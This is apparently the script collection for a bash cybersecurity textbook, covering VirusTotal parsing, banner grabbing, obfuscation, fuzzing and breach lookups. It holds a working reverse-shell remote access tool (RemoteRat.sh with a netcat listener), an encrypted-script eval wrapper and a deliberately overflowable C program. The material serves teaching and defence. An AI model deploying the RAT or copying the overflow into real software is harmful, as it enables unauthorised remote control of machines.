"version": "2017.11.15.1", "result": "malware (ai score=100)", "update": "20180712"}, "VBA32": {"detected": true, "version": "3.12.32.0", "result": "TrojanRansom.Wanna", "update": "20180712"}, "Malwarebytes": {"detected": true, "version": "2.1.1.1115", "result": "Ransom.WannaCrypt", "update": "20180712"}, "Zoner": {"detected": true, "version": "1.0", "result": "Trojan.Wannacry", "update": "20180711"}, "ESET-NOD32": {"detected": true, "version": "17703", "result": "Win32/Exploit.CVE-2017-0147.A", "update": "20180712"}, "Tencent": {"detected": true, "version": "1.0.0.1", "result": "Trojan.Win32.WannaCry.b", "update": "20180712"}, "Yandex": {"detected": true, "version": "5.5.1.3", "result": "Exploit.CVE-2017-0147!", "update": "20180712"}, "Ikarus": {"detected": true, "version": "0.1.5.2", "result": "Trojan-Ransom.WannaCry", "update": "20180712"}, "eGambit": {"detected": false, "version": null, "result": null, "update": "20180712"}, "GData": {"detected": true, "version": "A:25.17758B:25.12706", "result": "Win32.Trojan-Ransom.WannaCry.D", "update": "20180712"}, "AVG": {"detected": true, "version": "18.4.3895.0", "result": "Win32:WanaCry-A [Trj]", "update": "20180712"}, "Cybereason": {"detected": true, "version": "1.2.27", "result": "malicious.7c37d2", "update": "20180225"}, "Panda": {"detected": true, "version": "4.6.4.2", "result": "Trj/RansomCrypt.K", "update": "20180712"}, "CrowdStrike": {"detected": true, "version": "1.0", "result": "malicious_confidence_100% (W)", "update": "20180530"}, "Qihoo-360": {"detected": true, "version": "1.0.0.1120", "result": "Win32/Trojan.Multi.daf", "update": "20180712"}}, "scan_id": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c-1531416969", "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", "resource": "db349b97c37d22f5ea1d1841e3c89eb4", "response_code": 1, "scan_date": "2018-07-12 17:36:09", "permalink": 
"https://www.virustotal.com/file/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c/analysis/1531416969/", "verbose_msg": "Scan finished, information embedded", "total": 68, "positives": 61, "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "md5": "db349b97c37d22f5ea1d1841e3c89eb4"}

================================================
FILE: ch11/helloworld.c
================================================
#include <stdio.h>

int main()
{
    printf("Hello World!\n");
    return 0;
}

================================================
FILE: ch11/vtjson.awk
================================================
# Cybersecurity Ops with bash
# vtjson.awk
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.awk <json file>
#   <json file> File containing results from VirusTotal
#

FN="${1:-Calc_VirusTotal.txt}"
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" |    # <1>
awk '
NF == 9 {                                   # <2>
    COMMA=","
    QUOTE="\""                              # <3>
    if ( $3 == "true" COMMA ) {             # <4>
        VIRUS=$1                            # <5>
        gsub(QUOTE, "", VIRUS)              # <6>

        RESLT=$7
        gsub(QUOTE, "", RESLT)
        gsub(COMMA, "", RESLT)

        print VIRUS, "- result:", RESLT
    }
}'

================================================
FILE: ch11/vtjson.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# vtjson.sh
#
# Description:
# Search a JSON file for VirusTotal malware hits
#
# Usage:
# vtjson.sh [<json file>]
#   <json file> File containing results from VirusTotal
#               default: Calc_VirusTotal.txt
#

RE='^.(.*)...\{.*detect..(.*),..vers.*result....(.*).,..update.*$'    # <1>

FN="${1:-Calc_VirusTotal.txt}"
sed -e 's/{"scans": {/&\n /' -e 's/},/&\n/g' "$FN" |    # <2>
while read ALINE
do
    if [[ $ALINE =~ $RE ]]                  # <3>
    then
        VIRUS="${BASH_REMATCH[1]}"          # <4>
        FOUND="${BASH_REMATCH[2]}"
        RESLT="${BASH_REMATCH[3]}"

        if [[ $FOUND =~ .*true.* ]]         # <5>
        then
            echo $VIRUS "- result:" $RESLT
        fi
    fi
done

================================================
FILE: ch12/tagit.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# tagit.sh
#
# Description:
# Place open and close tags around a string
#
# Usage:
# tagit.sh <tag> <string>
#   <tag> Tag to use
#   <string> String to tag
#

printf '<%s>%s</%s>\n' "${1}" "${2}" "${1}"

================================================
FILE: ch12/webdash.sh
================================================
#!/bin/bash -
#
# Rapid Cybersecurity Ops
# webdash.sh
#
# Description:
# Create an information dashboard
# Heading
# --------------
# 1-line of output
# --------------
# 5 lines of output
# ...
# --------------
# column labels and then
# 8 lines of histograms
# ...
# --------------
#

# some important constant strings
UPTOP=$(tput cup 0 0)                       # <1>
ERAS2EOL=$(tput el)
REV=$(tput rev)         # reverse video
OFF=$(tput sgr0)        # general reset
SMUL=$(tput smul)       # underline mode on (start)
RMUL=$(tput rmul)       # underline mode off (reset)
COLUMNS=$(tput cols)    # how wide is our window
# DASHES='------------------------------------'
printf -v DASHES '%*s' $COLUMNS '-'         # <2>
DASHES=${DASHES// /-}

#
# prSection - print a section of the screen
#     print $1-many lines from stdin
#     each line is a full line of text
#     followed by erase-to-end-of-line
#     sections end with a line of dashes
#
function prSection ()
{
    local -i i                              # <3>
    for((i=0; i < ${1:-5}; i++))
    do
        read aline
        printf '%s%s\n' "$aline" "${ERAS2EOL}"    # <4>
    done
    printf '%s%s\n%s' "$DASHES" "${ERAS2EOL}" "${ERAS2EOL}"
}

function cleanup()                          # <5>
{
    if [[ -n $BGPID ]]
    then
        kill %1                             # <6>
        rm -f $TMPFILE
    fi
} &> /dev/null                              # <7>

trap cleanup EXIT

# launch the bg process
TMPFILE=$(tempfile)                         # <8>
{ bash tailcount.sh $1 | \
  bash livebar.sh > $TMPFILE ; } &          # <9>
BGPID=$!

clear
while true
do
    printf '%s' "$UPTOP"
    # heading:
    echo "${REV}Rapid Cyber Ops Ch. 12 -- Security Dashboard${OFF}" \
    | prSection 1
    #----------------------------------------
    {                                       # <10>
        printf 'connections:%4d %s\n' \
            $(netstat -an | grep 'ESTAB' | wc -l) "$(date)"
    } | prSection 1
    #----------------------------------------
    tail -5 /var/log/syslog | cut -c 1-16,45-105 | prSection 5
    #----------------------------------------
    { echo "${SMUL}yymmdd${RMUL}" \
           "${SMUL}hhmmss${RMUL}" \
           "${SMUL}count of events${RMUL}"
      tail -8 $TMPFILE
    } | prSection 9
    sleep 3
done

================================================
FILE: ch12/weblogfmt.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# weblogfmt.sh
#
# Description:
# Read in Apache web log and output as HTML
#
# Usage:
# weblogfmt.sh input.file > output.file
#

function tagit()
{
    printf '<%s>%s</%s>\n' "${1}" "${2}" "${1}"
}

#basic header tags
echo "<html>"                               # <1>
echo "<body>"
echo "<h1>$1</h1>"          #title

echo "<table border=1>"     #table with border
echo "<tr>"                 #new table row
echo "<th>IP Address</th>"  #column header
echo "<th>Date</th>"
echo "<th>URL Requested</th>"
echo "<th>Status Code</th>"
echo "<th>Size</th>"
echo "<th>Referrer</th>"
echo "<th>User Agent</th>"
echo "</tr>"

while read f1 f2 f3 f4 f5 f6 f7 f8 f9 f10 f11 f12plus    # <2>
do
    echo "<tr>"
    tagit "td" "${f1}"
    tagit "td" "${f4} ${f5}"                # <3>
    tagit "td" "${f6} ${f7}"
    tagit "td" "${f9}"
    tagit "td" "${f10}"
    tagit "td" "${f11}"
    tagit "td" "${f12plus}"
    echo "</tr>"
done < $1

#close tags
echo "</table>"
echo "</body>"
echo "</html>"

================================================
FILE: ch13/bannergrabber.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# bannergrabber.sh
#
# Description:
# Automatically pull the banners from HTTP, SMTP,
# and FTP servers
#
# Usage: ./bannergrabber.sh hostname [scratchfile]
#   scratchfile is used during processing but removed;
#   default is: "scratch.file" or tempfile-generated name
#
#

function isportopen ()
{
    (( $# < 2 )) && return 1                            # <1>
    local host port
    host=$1
    port=$2
    echo >/dev/null 2>&1 < /dev/tcp/${host}/${port}     # <2>
    return $?
}

function cleanup ()
{
    rm -f "$SCRATCH"
}

ATHOST="$1"
SCRATCH="$2"
if [[ -z $2 ]]
then
    if [[ -n $(type -p tempfile) ]]
    then
        SCRATCH=$(tempfile)
    else
        SCRATCH='scratch.file'
    fi
fi

trap cleanup EXIT                           # <3>
touch "$SCRATCH"                            # <4>

if isportopen $ATHOST 21    # FTP <5>
then
    # i.e., ftp -n $ATHOST
    exec 3<>/dev/tcp/${ATHOST}/21           # <6>
    echo -e 'quit\r\n' >&3                  # <7>
    cat <&3 >> "$SCRATCH"                   # <8>
fi

if isportopen $ATHOST 25    # SMTP
then
    # i.e., telnet $ATHOST 25
    exec 3<>/dev/tcp/${ATHOST}/25
    echo -e 'quit\r\n' >&3
    cat <&3 >> "$SCRATCH"
fi

if isportopen $ATHOST 80    # HTTP
then
    curl -LIs "https://${ATHOST}" >> "$SCRATCH"    # <9>
fi

cat "$SCRATCH"                              # <10>

================================================
FILE: ch13/smtpconnect.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# smtpconnect.sh
#
# Description:
# Connect to a SMTP server and print welcome banner
#
# Usage:
# smtpconnect.sh <host>
#   <host> SMTP server to connect to
#

exec 3<>/dev/tcp/"$1"/25
echo -e 'quit\r\n' >&3
cat <&3

================================================
FILE: ch14/askey.sh
================================================
# functions to convert decimal to ascii and vice-versa

# aschar - print the ascii character representation
#          of the number passed in as an argument
# example: aschar 65 ==> A
#
function aschar ()
{
    local ashex                             # <1>
    printf -v ashex '\\x%02x' $1            # <2>
    printf '%b' $ashex                      # <3>
}

# asnum - print the ascii (decimal) number
#         of the character passed in as $1
# example: asnum A ==> 65
#
function asnum ()
{
    printf '%d' "\"$1"                      # <4>
}

================================================
FILE: ch14/innerscript.sh
================================================
echo "This is an encrypted script"
echo "running uname -a"
uname -a

================================================
FILE: ch14/logfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# logfuscate.sh
#
# Description:
# Demonstration of logic obfuscation
#

f="$1"                      #<1>

a() (
    b()
    {
        f="$(($f+5))"       #<5>
        g="$(($f+7))"       #<6>
        c                   #<7>
    }

    b                       #<4>
)

c() (
    d()
    {
        g="$(($g-$f))"      #<10>
        f="$(($f-2))"       #<11>
        echo "$f"           #<12>
    }
    f="$(($f-3))"           #<8>
    d                       #<9>
)

f="$(($f+$2))"              #<2>
a                           #<3>

================================================
FILE: ch14/oneline.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# oneline.sh
#
# Description:
# Demonstration of one-line script obfuscation
#

if [[ $1 == "test" ]]; then echo "testing"; else echo "not testing"; fi; echo "some command"; echo "another command"

================================================
FILE: ch14/readable.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# readable.sh
#
# Description:
# Simple script to be obfuscated
#

if [[ $1 == "test" ]]
then
    echo "testing"
else
    echo "not testing"
fi

echo "some command"
echo "another command"

================================================
FILE: ch14/streamcipher.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# streamcipher.sh
#
# Description:
# A lightweight implementation of a stream cipher
# Pedagogical - not recommended for serious use
#
# Usage:
# streamcipher.sh [-d] <key> < inputfile
#   -d Decrypt mode
#   <key> Numeric key
#
#
source ./askey.sh                           # <1>

#
# Ncrypt - Encrypt - reads in characters
#          outputs 2digit hex #s
#
function Ncrypt ()                          # <2>
{
    TXT="$1"
    for((i=0; i< ${#TXT}; i++))             # <3>
    do
        CHAR="${TXT:i:1}"                   # <4>
        RAW=$(asnum "$CHAR")  # " " needed for space (32)    # <5>
        NUM=${RANDOM}
        COD=$(( RAW ^ ( NUM & 0x7F )))      # <6>
        printf "%02X" "$COD"                # <7>
    done
    echo                                    # <8>
}

#
# Dcrypt - DECRYPT - reads in a 2digit hex #s
#          outputs characters
#
function Dcrypt ()                          # <9>
{
    TXT="$1"
    for((i=0; i< ${#TXT}; i=i+2))           # <10>
    do
        CHAR="0x${TXT:i:2}"                 # <11>
        RAW=$(( $CHAR ))                    # <12>
        NUM=${RANDOM}
        COD=$(( RAW ^ ( NUM & 0x7F )))      # <13>
        aschar "$COD"                       # <14>
    done
    echo
}

if [[ -n $1 && $1 == "-d" ]]                # <15>
then
    DECRYPT="YES"
    shift                                   # <16>
fi

KEY=${1:-1776}                              # <17>
RANDOM="${KEY}"                             # <18>
while read -r                               # <19>
do
    if [[ -z $DECRYPT ]]                    # <20>
    then
        Ncrypt "$REPLY"
    else
        Dcrypt "$REPLY"
    fi
done

================================================
FILE: ch14/synfuscate.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# synfuscate.sh
#
# Description:
# Demonstration of syntax script obfuscation
#

a ()                                #<1>
{
    local a="Local Variable a"      #<2>
    echo "$a"
}

a="Global Variable a"               #<3>
echo "$a"

a

================================================
FILE: ch14/wrapper.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# wrapper.sh
#
# Description:
# Example of executing an encrypted "wrapped" script
#
# Usage:
# wrapper.sh
#   Enter the password when prompted
#

encrypted='U2FsdGVkX18WvDOyPFcvyvAozJHS3tjrZIPlZM9xRhz0tuwzDrKhKBBuugLxzp7T
MoJoqx02tX7KLhATS0Vqgze1C+kzFxtKyDAh9Nm2N0HXfSNuo9YfYD+15DoXEGPd'    #<1>

read -s word                        #<2>

innerScript=$(echo "$encrypted" | openssl aes-256-cbc -base64 -d -pass pass:"$word")    #<3>

eval "$innerScript"                 #<4>

================================================
FILE: ch15/fuzzer.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# fuzzer.sh
#
# Description:
# Fuzz a specified argument of a program
#
# Usage:
# bash fuzzer.sh <executable> <arg1> [?] <arg3> ...
#   <executable> The target executable program/script
#   <argn> The static arguments for the executable
#   '?' The argument to be fuzzed
# example: fuzzer.sh ./myprog -t '?' fn1 fn2
#
#
function usagexit ()                        # <1>
{
    echo "usage: $0 executable args"
    echo "example: $0 myapp -lpt arg \?"
    exit 1
} >&2                                       # <2>

if (($# < 2))                               # <3>
then
    usagexit
fi

# the app we will fuzz is the first arg
THEAPP="$1"
shift                                       # <4>
# is it really there?
type -t "$THEAPP" >/dev/null || usagexit    # <5>

# which arg to vary?
# find the ? and note its position
declare -i i
for ((i=0; $# ; i++))                       # <6>
do
    ALIST+=( "$1" )                         # <7>
    if [[ $1 == '?' ]]
    then
        NDX=$i                              # <8>
    fi
    shift
done

# printf "Executable: %s Arg: %d %s\n" "$THEAPP" $NDX "${ALIST[$NDX]}"

# now fuzz away:
MAX=10000
FUZONE="a"
FUZARG=""
for ((i=1; i <= MAX; i++))                  # <9>
do
    FUZARG="${FUZARG}${FUZONE}"             # aka +=
    ALIST[$NDX]="$FUZARG"
    # order of >s is important
    $THEAPP "${ALIST[@]}" 2>&1 >/dev/null   # <10>
    if (( $? )) ; then echo "Caused by: $FUZARG" >&2 ; fi    # <11>
done

================================================
FILE: ch15/fuzzme.c
================================================
#include <stdio.h>
#include <string.h>

//Cybersecurity Ops with bash
//Warning - This is an insecure program and is for demonstration
//purposes only

int main(int argc, char *argv[])
{
    char combined[50] = "";
    strcat(combined, argv[1]);
    strcat(combined, " ");
    strcat(combined, argv[2]);
    printf("The two arguments combined is: %s\n", combined);

    return(0);
}

================================================
FILE: ch16/LocalRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# LocalRat.sh
#
# Description:
# Remote access tool to be on a local system,
# it listens for a connection from the remote system
# and helps with any file transfer requested
#
# Usage: LocalRat.sh port1 [port2 [port3]]
#
#

# define our background file transfer daemon
function bgfilexfer ()
{
    while true
    do
        FN=$(nc -nlvvp $HOMEPORT2 2>>/tmp/x2.err)    # <3>
        if [[ $FN == 'exit' ]] ; then exit ; fi
        nc -nlp $HOMEPORT3 < $FN                     # <4>
    done
}

# -------------------- main ---------------------
HOMEPORT=$1
HOMEPORT2=${2:-$((HOMEPORT+1))}
HOMEPORT3=${3:-$((HOMEPORT2+1))}

# initiate the background file transfer daemon
bgfilexfer &                                # <1>

# listen for an incoming connection
nc -nlvp $HOMEPORT                          # <2>

================================================
FILE: ch16/RemoteRat.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# RemoteRat.sh
#
# Description:
# Remote access tool to be run on the remote system;
# mostly hands any input to the shell
# but if indicated (with a !) fetch and run a script
#
# Usage: RemoteRat.sh hostname port1 [port2 [port3]]
#

function cleanup ()
{
    rm -f $TMPFL
}

function runScript ()
{
    # tell 'em what script we want
    echo "$1" > /dev/tcp/${HOMEHOST}/${HOMEPORT2}      # <7>
    # stall
    sleep 1                                            # <8>
    if [[ $1 == 'exit' ]] ; then exit ; fi
    cat > $TMPFL </dev/tcp/${HOMEHOST}/${HOMEPORT3}    # <9>
    bash $TMPFL                                        # <10>
}

# ------------------- MAIN -------------------
# could do some error checking here
HOMEHOST=$1
HOMEPORT=$2
HOMEPORT2=${3:-$((HOMEPORT+1))}
HOMEPORT3=${4:-$((HOMEPORT2+1))}

TMPFL="/tmp/$$.sh"
trap cleanup EXIT

# phone home:
exec </dev/tcp/${HOMEHOST}/${HOMEPORT} 1>&0 2>&0       # <1>

while true
do
    echo -n '$ '                            # <2>
    read -r                                 # <3>
    if [[ ${REPLY:0:1} == '!' ]]            # <4>
    then
        # it's a script
        FN=${REPLY:1}                       # <5>
        runScript $FN
    else
        # normal case - run the cmd
        eval "$REPLY"                       # <6>
    fi
done

================================================
FILE: ch19/pingmonitor.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# pingmonitor.sh
#
# Description:
# Use ping to monitor host availability
#
# Usage:
# pingmonitor.sh <file> <seconds>
#   <file> File containing a list of hosts
#   <seconds> Number of seconds between pings
#

while true
do
    clear
    echo 'Cybersecurity Ops System Monitor'
    echo 'Status: Scanning ...'
    echo '-----------------------------------------'
    while read -r ipadd
    do
        ipadd=$(echo "$ipadd" | sed 's/\r//')    #<1>
        ping -n 1 "$ipadd" | egrep '(Destination host unreachable|100%)' &> /dev/null    #<2>
        if (( "$?" == 0 ))    #<3>
        then
            tput setaf 1      #<4>
            echo "Host $ipadd not found - $(date)" | tee -a monitorlog.txt    #<5>
            tput setaf 7
        fi
    done < "$1"

    echo ""
    echo "Done."

    for ((i="$2"; i > 0; i--))    #<6>
    do
        tput cup 1 0              #<7>
        echo "Status: Next scan in $i seconds"
        sleep 1
    done
done

================================================
FILE: ch20/softinv.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# softinv.sh
#
# Description:
# list the software installed on a system
# for later aggregation and analysis;
#
# Usage: ./softinv.sh [filename]
# output is written to $1 or <hostname>_softinv.txt
#

# set the output filename
OUTFN="${1:-${HOSTNAME}_softinv.txt}"       # <1>

# which command to run depends on the OS and what's there
OSbase=win
type -t rpm &> /dev/null                    # <2>
(( $? == 0 )) && OSbase=rpm                 # <3>
type -t dpkg &> /dev/null
(( $? == 0 )) && OSbase=deb
type -t apt &> /dev/null
(( $? == 0 )) && OSbase=apt

case ${OSbase} in                           # <4>
    win)
        INVCMD="wmic product get name,version //format:csv"
        ;;
    rpm)
        INVCMD="rpm -qa"
        ;;
    deb)
        INVCMD="dpkg -l"
        ;;
    apt)
        INVCMD="apt list --installed"
        ;;
    *)
        echo "error: OSbase=${OSbase}"
        exit -1
        ;;
esac

#
# run the inventory
#
$INVCMD 2>/dev/null > $OUTFN                # <5>

================================================
FILE: ch21/test.input
================================================
file ./TODO.txt
!file ./validate.sh
!file nogo.sh
user albing
!user bob
group mysql
!group skip
hash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8 validate.sh
hash b79f70b18538de0199e6829e06b547e079df8842 /bin/ls

================================================
FILE: ch21/validateconfig.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# validateconfig.sh
#
# Description:
# Validate a specified configuration exists
#
# Usage:
# validateconfig.sh < configfile
#
# configuration specification looks like:
# [[!]file|hash|reg|[!]user|[!]group] [args]
# examples:
# file /usr/local/bin/sfx - file exists
# hash 12384970347 /usr/local/bin/sfx - file has this hash
# !user bono - no user "bono" allowed
# group students - must have a students group
#

# errexit - show correct usage and exit
function errexit ()
{
    echo "invalid syntax at line $ln"
    echo "usage: [!]file|hash|reg|[!]user|[!]group [args]"    # <1>
    exit 2

} # errexit

# vfile - validate the [non]existence of filename
#     args: 1: the "not" flag - value:1/0
#           2: filename
#
function vfile ()
{
    local isThere=0
    [[ -e $2 ]] && isThere=1                # <2>
    (( $1 )) && let isThere=1-$isThere      # <3>

    return $isThere

} # vfile

# verify the user id
function vuser ()
{
    local isUser
    $UCMD $2 &>/dev/null
    isUser=$?
    if (( $1 ))                             # <4>
    then
        let isUser=1-$isUser
    fi

    return $isUser

} # vuser

# verify the group id
function vgroup ()
{
    local isGroup
    id $2 &>/dev/null
    isGroup=$?
    if (( $1 ))
    then
        let isGroup=1-$isGroup
    fi

    return $isGroup

} # vgroup

# verify the hash on the file
function vhash ()
{
    local res=0
    local X=$(sha1sum $2)                   # <5>
    if [[ ${X%% *} == $1 ]]                 # <6>
    then
        res=1
    fi

    return $res

} # vhash

# a windows system registry check
function vreg ()
{
    local res=0
    local keypath=$1
    local value=$2
    local expected=$3
    local REGVAL=$(query $keypath //v $value)

    if [[ $REGVAL == $expected ]]
    then
        res=1
    fi
    return $res

} # vreg

#
# main
#

# do this once, for use in verifying user ids
UCMD="net user"
type -t net &>/dev/null || UCMD="id"        # <7>

ln=0
while read cmd args
do
    let ln++

    donot=0
    basecmd=$cmd        # default: the command as written, no "!" prefix
    if [[ ${cmd:0:1} == '!' ]]              # <8>
    then
        donot=1
        basecmd=${cmd#\!}                   # <9>
    fi

    case "$basecmd" in
    file)
        OK=1
        vfile $donot "$args"
        res=$?
        ;;
    hash)
        OK=1
        # split args into 1st word , remainder
        vhash "${args%% *}" "${args#* }"    # <10>
        res=$?
        ;;
    reg)
        # Windows Only!
        OK=1
        vreg $args
        res=$?
        ;;
    user)
        OK=0
        vuser $donot $args      # the "not" flag is the first argument
        res=$?
        ;;
    group)
        OK=0
        vgroup $donot $args     # the "not" flag is the first argument
        res=$?
        ;;
    *)  errexit                             # <11>
        ;;
    esac

    if (( res != OK ))
    then
        echo "FAIL: [$ln] $cmd $args"
    fi
done

================================================
FILE: ch22/checkemail.1liner
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
#                 the Have I Been Pwned? database
#                 in 1 line

EMAILIN="$1"
if (( "$#" == 0 ))    #<1>
then
    printf 'Enter email address: '
    read EMAILIN
fi
EMAILIN="https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN"

echo 'Account pwned in the following breaches:'
curl -s "$EMAILIN" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"'    #<2>

================================================
FILE: ch22/checkemail.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkemail.sh
#
# Description:
# check an email address against the
# Have I Been Pwned? database
#
# Usage: ./checkemail.sh [<email>]
#   <email> Email address to check; default: reads from stdin
#

if (( "$#" == 0 ))    #<1>
then
    printf 'Enter email address: '
    read emailin
else
    emailin="$1"
fi

pwned=$(curl -s "https://haveibeenpwned.com/api/v2/breachedaccount/$emailin")    #<2>

if [ "$pwned" == "" ]
then
    exit 1
else
    echo 'Account pwned in the following breaches:'
    echo "$pwned" | grep -Po '"Name":".*?"' | cut -d':' -f2 | tr -d '\"'    #<3>
    exit 0
fi

================================================
FILE: ch22/checkemailAlt.sh
================================================
#!/bin/bash
#
# checkemail.sh - check an email address against
#                 the Have I Been Pwned? database
#

if (( "$#" == 0 ))    #<1>
then
    printf 'Enter email address: '
    read emailin
else
    emailin="$1"
fi

URL="https://haveibeenpwned.com/api/v2/breachedaccount/$emailin"
pwned=$(curl -s "$URL" | grep -Po '"Name":".*?"' )    #<2>

if [ "$pwned" == "" ]
then
    exit 1
else
    echo 'Account pwned in the following breaches:'    # <3>
    pwned="${pwned//\"/}"       # remove all quotes
    pwned="${pwned//Name:/}"    # remove all 'Name:'
    echo "${pwned}"
    exit 0
fi

================================================
FILE: ch22/checkpass.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# checkpass.sh
#
# Description:
# Check a password against the
# Have I Been Pwned? database
#
# Usage: ./checkpass.sh [<password>]
#   <password> Password to check
#              default: read from stdin
#

if (( "$#" == 0 ))    #<1>
then
    printf 'Enter your password: '
    read -s passin    #<2>
    echo
else
    passin="$1"
fi

passin=$(echo -n "$passin" | sha1sum)    #<3>
passin=${passin:0:40}

firstFive=${passin:0:5}    #<4>
ending=${passin:5}

pwned=$(curl -s "https://api.pwnedpasswords.com/range/$firstFive" | \
        tr -d '\r' | grep -i "$ending" )    #<5>
passwordFound=${pwned##*:}    #<6>

if [ "$passwordFound" == "" ]
then
    exit 1
else
    printf 'Password is Pwned %d Times!\n' "$passwordFound"
    exit 0
fi

================================================
FILE: ch22/emailbatch.sh
================================================
#!/bin/bash -
#
# Cybersecurity Ops with bash
# emailbatch.sh
#
# Description:
# Read in a file of email addresses and run them
# against Have I Been Pwned
#
# Usage: ./emailbatch.sh [<filename>]
#   <filename> File with one email address on each line
#              default: reads from stdin
#

cat "$1" | tr -d '\r' | while read fileLine    #<1>
do
    ./checkemail.sh "$fileLine" > /dev/null    #<2>

    if (( "$?" == 0 ))    #<3>
    then
        echo "$fileLine is Pwned!"
    fi

    sleep 0.25    #<4>
done

================================================
FILE: readme.txt
================================================
Cybersecurity Ops with bash
Attack, Defend, and Analyze from the Command Line
----------------------------------------------------------------------------------------
Scripts Version 1.0
----------------------------------------------------------------------------------------

About
----------------------------------------------------------------------------------------
All of the scripts and data referenced in the book are included with this file.
The number tags (i.e. <1>, <2>, <3>) contained in each script file correspond to
the numbered callout explanations from within the book.

Script Robustness
----------------------------------------------------------------------------------------
The included scripts are written to illustrate and teach concepts.
The scripts are not designed to be efficient or robust enough for enterprise deployment.
Use caution if you choose to use the scripts in a live environment. Be sure to follow
programming best practices and test your scripts before deployment.

Disclaimer
----------------------------------------------------------------------------------------
The included scripts are provided "as is" and without any warranties or guarantees.

----------------------------------------------------------------------------------------
https://www.rapidcyberops.com
----------------------------------------------------------------------------------------